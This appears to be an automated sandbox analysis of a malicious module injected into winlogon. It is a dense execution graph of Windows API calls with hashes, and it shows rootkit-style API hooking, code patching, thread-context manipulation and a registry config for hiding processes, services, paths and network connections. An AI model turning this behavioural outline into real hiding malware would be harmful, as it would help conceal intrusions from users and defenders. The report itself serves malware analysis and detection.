                          execution_graph 15125 1ca7d1e5c8d 15127 1ca7d1e5c94 15125->15127 15126 1ca7d1e5cfb 15127->15126 15128 1ca7d1e5d77 VirtualProtect 15127->15128 15129 1ca7d1e5da3 GetLastError 15128->15129 15130 1ca7d1e5db1 15128->15130 15129->15130 14960 1ca7d1e1bc4 14967 1ca7d1e1724 GetProcessHeap HeapAlloc 14960->14967 14962 1ca7d1e1bda SleepEx 14963 1ca7d1e1724 50 API calls 14962->14963 14964 1ca7d1e1bd3 14963->14964 14964->14962 14966 1ca7d1e159c StrCmpIW StrCmpW 14964->14966 15018 1ca7d1e19b0 14964->15018 14966->14964 15035 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14967->15035 14969 1ca7d1e174c 15036 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14969->15036 14971 1ca7d1e1754 15037 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14971->15037 14973 1ca7d1e175d 15038 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14973->15038 14975 1ca7d1e1766 15039 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14975->15039 14977 1ca7d1e176f 15040 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14977->15040 14979 1ca7d1e1778 15041 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14979->15041 14981 1ca7d1e1781 15042 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14981->15042 14983 1ca7d1e178a RegOpenKeyExW 14984 1ca7d1e19a2 14983->14984 14985 1ca7d1e17bc RegOpenKeyExW 14983->14985 14984->14964 14986 1ca7d1e17e5 14985->14986 14987 1ca7d1e17fb RegOpenKeyExW 14985->14987 15049 1ca7d1e12b8 RegQueryInfoKeyW 14986->15049 14989 1ca7d1e1836 RegOpenKeyExW 14987->14989 14990 1ca7d1e181f 14987->14990 14993 1ca7d1e1871 RegOpenKeyExW 14989->14993 14994 1ca7d1e185a 14989->14994 15043 1ca7d1e104c RegQueryInfoKeyW 14990->15043 14997 1ca7d1e1895 14993->14997 14998 1ca7d1e18ac RegOpenKeyExW 14993->14998 14996 1ca7d1e12b8 16 API calls 14994->14996 15001 1ca7d1e1867 RegCloseKey 14996->15001 15002 1ca7d1e12b8 16 API calls 14997->15002 14999 1ca7d1e18e7 RegOpenKeyExW 14998->14999 15000 1ca7d1e18d0 14998->15000 15005 1ca7d1e1922 RegOpenKeyExW 14999->15005 15006 1ca7d1e190b 14999->15006 15004 1ca7d1e12b8 16 API calls 15000->15004 15001->14993 15003 1ca7d1e18a2 RegCloseKey 15002->15003 15003->14998 15007 1ca7d1e18dd RegCloseKey 15004->15007 15009 1ca7d1e1946 15005->15009 15010 1ca7d1e195d RegOpenKeyExW 15005->15010 15008 1ca7d1e104c 6 API calls 15006->15008 15007->14999 15011 1ca7d1e1918 RegCloseKey 15008->15011 15012 1ca7d1e104c 6 API calls 15009->15012 15013 1ca7d1e1998 RegCloseKey 15010->15013 15014 1ca7d1e1981 15010->15014 15011->15005 15015 1ca7d1e1953 RegCloseKey 15012->15015 15013->14984 15016 1ca7d1e104c 6 API calls 15014->15016 15015->15010 15017 1ca7d1e198e RegCloseKey 15016->15017 15017->15013 15063 1ca7d1e14a0 15018->15063 15035->14969 15036->14971 15037->14973 15038->14975 15039->14977 15040->14979 15041->14981 15042->14983 15044 1ca7d1e11b5 RegCloseKey 15043->15044 15045 1ca7d1e10bf 15043->15045 15044->14989 15045->15044 15046 1ca7d1e10cf RegEnumValueW 15045->15046 15047 1ca7d1e1125 15046->15047 15047->15044 15047->15046 15048 1ca7d1e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15047->15048 15048->15047 15050 1ca7d1e1486 RegCloseKey 15049->15050 15051 1ca7d1e1323 GetProcessHeap HeapAlloc 15049->15051 15050->14987 15052 1ca7d1e1472 GetProcessHeap HeapFree 15051->15052 15053 1ca7d1e134e RegEnumValueW 15051->15053 15052->15050 15055 1ca7d1e13a1 15053->15055 15055->15052 15055->15053 15056 1ca7d1e13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15055->15056 15057 1ca7d1e141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15055->15057 15058 1ca7d1e1530 15055->15058 15056->15057 15057->15055 15059 1ca7d1e1580 15058->15059 15060 1ca7d1e154a 15058->15060 15059->15055 15060->15059 15061 1ca7d1e1569 StrCmpW 15060->15061 15062 1ca7d1e1561 StrCmpIW 15060->15062 15061->15060 15062->15060 15064 1ca7d1e14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15063->15064 15065 1ca7d1e14c2 GetProcessHeap HeapFree 15063->15065 15065->15064 15065->15065 15594 1ca7d1e81c0 15595 1ca7d1e81c9 __scrt_acquire_startup_lock 15594->15595 15597 1ca7d1e81cd 15595->15597 15598 1ca7d1ebbb4 15595->15598 15599 1ca7d1ebbd4 15598->15599 15608 1ca7d1ebbed 15598->15608 15600 1ca7d1ebbf2 15599->15600 15601 1ca7d1ebbdc 15599->15601 15633 1ca7d1ee864 15600->15633 15627 1ca7d1ed1f4 15601->15627 15608->15597 15614 1ca7d1ebc69 15617 1ca7d1ed1f4 __std_exception_copy 13 API calls 15614->15617 15615 1ca7d1ebc7a 15616 1ca7d1eb994 14 API calls 15615->15616 15619 1ca7d1ebc96 15616->15619 15625 1ca7d1ebc6e 15617->15625 15618 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15618->15608 15620 1ca7d1ebcc6 15619->15620 15621 1ca7d1ebcdf 15619->15621 15619->15625 15663 1ca7d1ed2a0 15620->15663 15623 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15621->15623 15623->15625 15625->15618 15626 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15626->15608 15669 1ca7d1ecb10 15627->15669 15630 1ca7d1ed04c 15731 1ca7d1ecef8 15630->15731 15634 1ca7d1ee871 15633->15634 15635 1ca7d1ebbf7 15633->15635 15817 1ca7d1ecacc 15634->15817 15639 1ca7d1edf38 GetModuleFileNameW 15635->15639 15637 1ca7d1ee8a0 15822 1ca7d1ee53c 15637->15822 15640 1ca7d1edf91 15639->15640 15641 1ca7d1edf7d GetLastError 15639->15641 15643 1ca7d1edd78 14 API calls 15640->15643 16013 1ca7d1ed184 15641->16013 15644 1ca7d1edfbf 15643->15644 15649 1ca7d1edfd0 15644->15649 16018 1ca7d1ef198 15644->16018 15645 1ca7d1e8070 _invalid_parameter_noinfo 8 API calls 15648 1ca7d1ebc0e 15645->15648 15651 1ca7d1eb994 15648->15651 16022 1ca7d1ede1c 15649->16022 15650 1ca7d1edf8a 15650->15645 15653 1ca7d1eb9d2 15651->15653 15655 1ca7d1eba38 15653->15655 16039 1ca7d1eec1c 15653->16039 15654 1ca7d1ebb25 15657 1ca7d1ebb54 15654->15657 15655->15654 15656 1ca7d1eec1c 14 API calls 15655->15656 15656->15655 15658 1ca7d1ebba4 15657->15658 15659 1ca7d1ebb6c 15657->15659 15658->15614 15658->15615 15659->15658 15660 1ca7d1ed220 __std_exception_copy 13 API calls 15659->15660 15661 1ca7d1ebb9a 15660->15661 15662 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15661->15662 15662->15658 15664 1ca7d1ed2a5 HeapFree 15663->15664 15665 1ca7d1ebccf 15663->15665 15664->15665 15666 1ca7d1ed2c0 GetLastError 15664->15666 15665->15626 15667 1ca7d1ed2cd Concurrency::details::SchedulerProxy::DeleteThis 15666->15667 15668 1ca7d1ed1f4 __std_exception_copy 11 API calls 15667->15668 15668->15665 15670 1ca7d1ecb59 GetLastError 15669->15670 15674 1ca7d1ecb2f __std_exception_copy 15669->15674 15671 1ca7d1ecb6c 15670->15671 15673 1ca7d1ecb8a SetLastError 15671->15673 15675 1ca7d1ecb87 15671->15675 15677 1ca7d1ec940 __std_exception_copy 11 API calls 15671->15677 15672 1ca7d1ebbe1 15672->15630 15673->15672 15674->15672 15678 1ca7d1ec940 GetLastError 15674->15678 15675->15673 15677->15675 15679 1ca7d1ec966 15678->15679 15680 1ca7d1ec96c SetLastError 15679->15680 15696 1ca7d1ed220 15679->15696 15681 1ca7d1ec9e5 15680->15681 15681->15672 15683 1ca7d1ec987 15684 1ca7d1ec9a5 FlsSetValue 15683->15684 15685 1ca7d1ec995 FlsSetValue 15683->15685 15686 1ca7d1ec9c8 15684->15686 15687 1ca7d1ec9b1 FlsSetValue 15684->15687 15688 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15685->15688 15703 1ca7d1ec758 15686->15703 15690 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15687->15690 15689 1ca7d1ec9a3 15688->15689 15689->15680 15695 1ca7d1ec9c6 SetLastError 15690->15695 15695->15681 15697 1ca7d1ed231 __std_exception_copy 15696->15697 15698 1ca7d1ed282 15697->15698 15699 1ca7d1ed266 HeapAlloc 15697->15699 15708 1ca7d1eb470 15697->15708 15701 1ca7d1ed1f4 __std_exception_copy 12 API calls 15698->15701 15699->15697 15700 1ca7d1ed280 15699->15700 15700->15683 15701->15700 15717 1ca7d1ec630 15703->15717 15711 1ca7d1eb4c0 15708->15711 15716 1ca7d1ec558 EnterCriticalSection 15711->15716 15729 1ca7d1ec558 EnterCriticalSection 15717->15729 15732 1ca7d1ecf23 15731->15732 15739 1ca7d1ecf94 15732->15739 15734 1ca7d1ecf4a 15735 1ca7d1ecf6d 15734->15735 15749 1ca7d1ec3e0 15734->15749 15736 1ca7d1ecf82 15735->15736 15738 1ca7d1ec3e0 _invalid_parameter_noinfo 17 API calls 15735->15738 15736->15608 15738->15736 15762 1ca7d1eccc8 15739->15762 15744 1ca7d1ecfcf 15744->15734 15750 1ca7d1ec438 15749->15750 15751 1ca7d1ec3ef GetLastError 15749->15751 15750->15735 15752 1ca7d1ec404 15751->15752 15753 1ca7d1ecba0 _invalid_parameter_noinfo 14 API calls 15752->15753 15754 1ca7d1ec41e SetLastError 15753->15754 15754->15750 15755 1ca7d1ec441 15754->15755 15756 1ca7d1ec3e0 _invalid_parameter_noinfo 15 API calls 15755->15756 15757 1ca7d1ec467 15756->15757 15788 1ca7d1effe8 15757->15788 15763 1ca7d1ecce4 GetLastError 15762->15763 15764 1ca7d1ecd1f 15762->15764 15765 1ca7d1eccf4 15763->15765 15764->15744 15768 1ca7d1ecd34 15764->15768 15775 1ca7d1ecba0 15765->15775 15769 1ca7d1ecd68 15768->15769 15770 1ca7d1ecd50 GetLastError SetLastError 15768->15770 15769->15744 15771 1ca7d1ed06c IsProcessorFeaturePresent 15769->15771 15770->15769 15772 1ca7d1ed07f 15771->15772 15780 1ca7d1ecd80 15772->15780 15776 1ca7d1ecbc8 FlsGetValue 15775->15776 15777 1ca7d1ecbc4 15775->15777 15776->15777 15778 1ca7d1ecbde SetLastError 15777->15778 15779 1ca7d1ec940 __std_exception_copy 13 API calls 15777->15779 15778->15764 15779->15778 15781 1ca7d1ecdba _invalid_parameter_noinfo 15780->15781 15782 1ca7d1ecde2 RtlCaptureContext RtlLookupFunctionEntry 15781->15782 15783 1ca7d1ece64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15782->15783 15784 1ca7d1ece2e RtlVirtualUnwind 15782->15784 15785 1ca7d1eceb6 _invalid_parameter_noinfo 15783->15785 15784->15783 15786 1ca7d1e8070 _invalid_parameter_noinfo 8 API calls 15785->15786 15787 1ca7d1eced5 GetCurrentProcess TerminateProcess 15786->15787 15789 1ca7d1ec48f 15788->15789 15790 1ca7d1f0001 15788->15790 15792 1ca7d1f0054 15789->15792 15790->15789 15796 1ca7d1f0a40 15790->15796 15793 1ca7d1f006d 15792->15793 15795 1ca7d1ec49f 15792->15795 15793->15795 15814 1ca7d1ee8c4 15793->15814 15795->15735 15805 1ca7d1ecab0 15796->15805 15798 1ca7d1f0a4f 15804 1ca7d1f0a95 15798->15804 15813 1ca7d1ec558 EnterCriticalSection 15798->15813 15804->15789 15806 1ca7d1ecb10 __std_exception_copy 13 API calls 15805->15806 15808 1ca7d1ecab9 15806->15808 15807 1ca7d1ecabe 15807->15798 15808->15807 15809 1ca7d1ecae8 FlsGetValue 15808->15809 15810 1ca7d1ecae4 15808->15810 15809->15810 15811 1ca7d1ec940 __std_exception_copy 13 API calls 15810->15811 15812 1ca7d1ecafe 15810->15812 15811->15812 15812->15798 15815 1ca7d1ecab0 _invalid_parameter_noinfo 14 API calls 15814->15815 15816 1ca7d1ee8cd 15815->15816 15818 1ca7d1ecae8 FlsGetValue 15817->15818 15819 1ca7d1ecae4 15817->15819 15818->15819 15820 1ca7d1ec940 __std_exception_copy 13 API calls 15819->15820 15821 1ca7d1ecafe 15819->15821 15820->15821 15821->15637 15845 1ca7d1ee7ac 15822->15845 15827 1ca7d1ee58e 15827->15635 15830 1ca7d1ee5a7 15831 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15830->15831 15831->15827 15832 1ca7d1ee5b6 15832->15832 15871 1ca7d1ee8e0 15832->15871 15835 1ca7d1ee6b2 15836 1ca7d1ed1f4 __std_exception_copy 13 API calls 15835->15836 15837 1ca7d1ee6b7 15836->15837 15840 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15837->15840 15838 1ca7d1ee70d 15839 1ca7d1ee774 15838->15839 15882 1ca7d1ee05c 15838->15882 15844 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15839->15844 15840->15827 15841 1ca7d1ee6cc 15841->15838 15842 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15841->15842 15842->15838 15844->15827 15846 1ca7d1ee7cf 15845->15846 15851 1ca7d1ee7d9 15846->15851 15897 1ca7d1ec558 EnterCriticalSection 15846->15897 15852 1ca7d1ee571 15851->15852 15854 1ca7d1ecacc 14 API calls 15851->15854 15857 1ca7d1ee22c 15852->15857 15855 1ca7d1ee8a0 15854->15855 15856 1ca7d1ee53c 56 API calls 15855->15856 15856->15852 15898 1ca7d1edd78 15857->15898 15859 1ca7d1ee240 15860 1ca7d1ee25e 15859->15860 15861 1ca7d1ee24c GetOEMCP 15859->15861 15862 1ca7d1ee273 15860->15862 15863 1ca7d1ee263 GetACP 15860->15863 15861->15862 15862->15827 15864 1ca7d1ec5d0 15862->15864 15863->15862 15865 1ca7d1ec61b 15864->15865 15869 1ca7d1ec5df __std_exception_copy 15864->15869 15866 1ca7d1ed1f4 __std_exception_copy 13 API calls 15865->15866 15868 1ca7d1ec619 15866->15868 15867 1ca7d1ec602 HeapAlloc 15867->15868 15867->15869 15868->15830 15868->15832 15869->15865 15869->15867 15870 1ca7d1eb470 __std_exception_copy 2 API calls 15869->15870 15870->15869 15872 1ca7d1ee22c 16 API calls 15871->15872 15873 1ca7d1ee91b 15872->15873 15874 1ca7d1eea71 15873->15874 15876 1ca7d1ee958 IsValidCodePage 15873->15876 15881 1ca7d1ee972 _invalid_parameter_noinfo 15873->15881 15875 1ca7d1e8070 _invalid_parameter_noinfo 8 API calls 15874->15875 15877 1ca7d1ee6a9 15875->15877 15876->15874 15878 1ca7d1ee969 15876->15878 15877->15835 15877->15841 15879 1ca7d1ee998 GetCPInfo 15878->15879 15878->15881 15879->15874 15879->15881 15914 1ca7d1ee344 15881->15914 16012 1ca7d1ec558 EnterCriticalSection 15882->16012 15899 1ca7d1edd9c 15898->15899 15905 1ca7d1edd97 15898->15905 15900 1ca7d1ecab0 _invalid_parameter_noinfo 14 API calls 15899->15900 15899->15905 15901 1ca7d1eddb7 15900->15901 15906 1ca7d1effb4 15901->15906 15905->15859 15907 1ca7d1effc9 15906->15907 15908 1ca7d1eddda 15906->15908 15907->15908 15909 1ca7d1f0a40 _invalid_parameter_noinfo 14 API calls 15907->15909 15910 1ca7d1f0020 15908->15910 15909->15908 15911 1ca7d1f0035 15910->15911 15912 1ca7d1f0048 15910->15912 15911->15912 15913 1ca7d1ee8c4 _invalid_parameter_noinfo 14 API calls 15911->15913 15912->15905 15913->15912 15915 1ca7d1ee38f GetCPInfo 15914->15915 15916 1ca7d1ee485 15914->15916 15915->15916 15921 1ca7d1ee3a2 15915->15921 15917 1ca7d1e8070 _invalid_parameter_noinfo 8 API calls 15916->15917 15918 1ca7d1ee524 15917->15918 15918->15874 15925 1ca7d1f1474 15921->15925 15924 1ca7d1f1938 33 API calls 15924->15916 15926 1ca7d1edd78 14 API calls 15925->15926 15927 1ca7d1f14b6 15926->15927 15945 1ca7d1eec58 15927->15945 15947 1ca7d1eec61 MultiByteToWideChar 15945->15947 15951 1ca7d1f190d 15952 1ca7d1e8070 _invalid_parameter_noinfo 8 API calls 15951->15952 15954 1ca7d1ee44c 15952->15954 15954->15924 15956 1ca7d1f17c5 15956->15951 15957 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15956->15957 15957->15951 15962 1ca7d1f176d 15962->15956 15963 1ca7d1f17d6 15962->15963 15964 1ca7d1f1785 15962->15964 15965 1ca7d1ec5d0 14 API calls 15963->15965 15967 1ca7d1f18a8 15963->15967 15968 1ca7d1f17f4 15963->15968 15964->15956 15966 1ca7d1ef218 10 API calls 15964->15966 15965->15968 15966->15956 15967->15956 15969 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15967->15969 15968->15956 15970 1ca7d1ef218 10 API calls 15968->15970 15969->15956 15971 1ca7d1f1874 15970->15971 15971->15967 15972 1ca7d1f1894 15971->15972 15973 1ca7d1f18aa 15971->15973 15986 1ca7d1eece8 15972->15986 15974 1ca7d1eece8 WideCharToMultiByte 15973->15974 15976 1ca7d1f18a2 15974->15976 15976->15967 15977 1ca7d1f18c2 15976->15977 15977->15956 15978 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15977->15978 15978->15956 15981 1ca7d1ef267 15982 1ca7d1ef26f 15981->15982 16007 1ca7d1ef30c 15981->16007 15982->15962 15985 1ca7d1ef2cd LCMapStringW 15985->15982 15988 1ca7d1eed0c WideCharToMultiByte 15986->15988 15993 1ca7d1ef086 VirtualProtect 15998 1ca7d1ef0b3 VirtualProtect 15993->15998 16003 1ca7d1ef134 15993->16003 16000 1ca7d1ef0e0 15998->16000 15998->16003 16001 1ca7d1ec5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 16000->16001 16002 1ca7d1ef0e7 16001->16002 16002->15981 16004 1ca7d1ef174 16003->16004 16005 1ca7d1eef88 EnterCriticalSection LeaveCriticalSection 16003->16005 16004->15981 16005->16004 16008 1ca7d1ef328 16007->16008 16009 1ca7d1ef34a 16007->16009 16008->16009 16010 1ca7d1eef88 9 API calls 16008->16010 16009->15985 16010->16009 16036 1ca7d1ed1d0 16013->16036 16015 1ca7d1ed191 Concurrency::details::SchedulerProxy::DeleteThis 16016 1ca7d1ed1f4 __std_exception_copy 13 API calls 16015->16016 16017 1ca7d1ed1a1 16016->16017 16017->15650 16019 1ca7d1ef1ca 16018->16019 16020 1ca7d1ef1a9 16018->16020 16019->15649 16020->16019 16021 1ca7d1eef88 9 API calls 16020->16021 16021->16019 16023 1ca7d1ede5b 16022->16023 16028 1ca7d1ede40 16022->16028 16024 1ca7d1ede60 16023->16024 16025 1ca7d1eece8 WideCharToMultiByte 16023->16025 16027 1ca7d1ed1f4 __std_exception_copy 13 API calls 16024->16027 16024->16028 16026 1ca7d1edeb7 16025->16026 16026->16024 16029 1ca7d1edebe GetLastError 16026->16029 16030 1ca7d1edee9 16026->16030 16027->16028 16028->15650 16031 1ca7d1ed184 13 API calls 16029->16031 16032 1ca7d1eece8 WideCharToMultiByte 16030->16032 16033 1ca7d1edecb 16031->16033 16034 1ca7d1edf10 16032->16034 16035 1ca7d1ed1f4 __std_exception_copy 13 API calls 16033->16035 16034->16028 16034->16029 16035->16028 16037 1ca7d1ecb10 __std_exception_copy 13 API calls 16036->16037 16038 1ca7d1ed1d9 16037->16038 16038->16015 16040 1ca7d1eeba8 16039->16040 16041 1ca7d1edd78 14 API calls 16040->16041 16042 1ca7d1eebcc 16041->16042 16042->15653 16951 1ca7d1eb500 16956 1ca7d1ec558 EnterCriticalSection 16951->16956 14954 1ca7d1e41f9 14957 1ca7d1e4146 _invalid_parameter_noinfo 14954->14957 14955 1ca7d1e41b0 14956 1ca7d1e4196 VirtualQuery 14956->14955 14956->14957 14957->14955 14957->14956 14958 1ca7d1e41ca VirtualAlloc 14957->14958 14958->14955 14959 1ca7d1e41fb GetLastError 14958->14959 14959->14957 17784 1ca7d1ec828 17785 1ca7d1ec842 17784->17785 17786 1ca7d1ec82d 17784->17786 17790 1ca7d1ec848 17786->17790 17791 1ca7d1ec892 17790->17791 17792 1ca7d1ec88a 17790->17792 17794 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17791->17794 17793 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17792->17793 17793->17791 17795 1ca7d1ec89f 17794->17795 17796 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17795->17796 17797 1ca7d1ec8ac 17796->17797 17798 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17797->17798 17799 1ca7d1ec8b9 17798->17799 17800 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17799->17800 17801 1ca7d1ec8c6 17800->17801 17802 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17801->17802 17803 1ca7d1ec8d3 17802->17803 17804 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17803->17804 17805 1ca7d1ec8e0 17804->17805 17806 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17805->17806 17807 1ca7d1ec8ed 17806->17807 17808 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17807->17808 17809 1ca7d1ec8fd 17808->17809 17810 1ca7d1ed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17809->17810 17811 1ca7d1ec90d 17810->17811 17816 1ca7d1ec6f8 17811->17816 17830 1ca7d1ec558 EnterCriticalSection 17816->17830 17849 1ca7d1ef820 17852 1ca7d1ef7d8 17849->17852 17857 1ca7d1ec558 EnterCriticalSection 17852->17857 18689 1ca7d1eff40 18690 1ca7d1eff4b 18689->18690 18698 1ca7d1f2c24 18690->18698 18711 1ca7d1ec558 EnterCriticalSection 18698->18711 15122 1ca7d1e1e3c LoadLibraryA GetProcAddress 15123 1ca7d1e1e62 SleepEx 15122->15123 15124 1ca7d1e1e6f 15122->15124 15123->15123 15067 1ca7d1e6430 15068 1ca7d1e643d 15067->15068 15069 1ca7d1e6449 15068->15069 15075 1ca7d1e655a 15068->15075 15070 1ca7d1e647e 15069->15070 15071 1ca7d1e64cd 15069->15071 15072 1ca7d1e64a6 SetThreadContext 15070->15072 15072->15071 15073 1ca7d1e6581 VirtualProtect FlushInstructionCache 15073->15075 15074 1ca7d1e663e 15076 1ca7d1e665e 15074->15076 15085 1ca7d1e4b20 15074->15085 15075->15073 15075->15074 15089 1ca7d1e5530 GetCurrentProcess 15076->15089 15079 1ca7d1e6663 15080 1ca7d1e66b7 15079->15080 15081 1ca7d1e6677 ResumeThread 15079->15081 15093 1ca7d1e8070 15080->15093 15082 1ca7d1e66ab 15081->15082 15082->15079 15088 1ca7d1e4b3c 15085->15088 15086 1ca7d1e4b9f 15086->15076 15087 1ca7d1e4b52 VirtualFree 15087->15088 15088->15086 15088->15087 15092 1ca7d1e554c 15089->15092 15090 1ca7d1e5562 VirtualProtect FlushInstructionCache 15090->15092 15091 1ca7d1e5593 15091->15079 15092->15090 15092->15091 15094 1ca7d1e8079 15093->15094 15095 1ca7d1e66ff 15094->15095 15096 1ca7d1e8848 IsProcessorFeaturePresent 15094->15096 15097 1ca7d1e8860 15096->15097 15102 1ca7d1e891c RtlCaptureContext 15097->15102 15103 1ca7d1e8936 RtlLookupFunctionEntry 15102->15103 15104 1ca7d1e8873 15103->15104 15105 1ca7d1e894c RtlVirtualUnwind 15103->15105 15106 1ca7d1e8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15104->15106 15105->15103 15105->15104 15107 1ca7d1e2c80 TlsGetValue TlsGetValue TlsGetValue 15108 1ca7d1e2cd9 15107->15108 15109 1ca7d1e2d51 NtEnumerateValueKey 15107->15109 15108->15109 15112 1ca7d1e2ce1 15108->15112 15110 1ca7d1e2d86 15109->15110 15111 1ca7d1e2d4c 15109->15111 15110->15111 15114 1ca7d1e2e06 TlsSetValue TlsSetValue TlsSetValue 15110->15114 15115 1ca7d1e2da0 NtEnumerateValueKey 15110->15115 15117 1ca7d1e3f88 StrCmpNIW 15110->15117 15112->15111 15113 1ca7d1e2d2d NtEnumerateValueKey 15112->15113 15112->15114 15118 1ca7d1e3f88 15112->15118 15113->15111 15113->15112 15114->15111 15115->15110 15117->15110 15119 1ca7d1e3f95 StrCmpNIW 15118->15119 15120 1ca7d1e3faa 15118->15120 15119->15120 15120->15112 15121 1ca7d1ef370 VirtualProtect 18022 1ca7d1ef870 18023 1ca7d1ef8a0 18022->18023 18024 1ca7d1ef8c7 18022->18024 18023->18024 18025 1ca7d1ecb10 __std_exception_copy 13 API calls 18023->18025 18029 1ca7d1ef8b4 18023->18029 18026 1ca7d1ef99c 18024->18026 18045 1ca7d1ec558 EnterCriticalSection 18024->18045 18025->18029 18030 1ca7d1efab3 18026->18030 18032 1ca7d1efa03 18026->18032 18038 1ca7d1ef9ca 18026->18038 18027 1ca7d1ef904 18029->18024 18029->18027 18031 1ca7d1ef949 18029->18031 18033 1ca7d1efac0 18030->18033 18047 1ca7d1ec5ac LeaveCriticalSection 18030->18047 18034 1ca7d1ed1f4 __std_exception_copy 13 API calls 18031->18034 18042 1ca7d1efa61 18032->18042 18046 1ca7d1ec5ac LeaveCriticalSection 18032->18046 18037 1ca7d1ef94e 18034->18037 18039 1ca7d1ed04c _invalid_parameter_noinfo 38 API calls 18037->18039 18038->18032 18040 1ca7d1ecab0 _invalid_parameter_noinfo 14 API calls 18038->18040 18039->18027 18041 1ca7d1ef9f3 18040->18041 18043 1ca7d1ecab0 _invalid_parameter_noinfo 14 API calls 18041->18043 18044 1ca7d1ecab0 14 API calls _invalid_parameter_noinfo 18042->18044 18043->18032 18044->18042

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Value$Enumerate
                          • String ID:
                          • API String ID: 3520290360-0
                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 2135414181-2609720707
                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
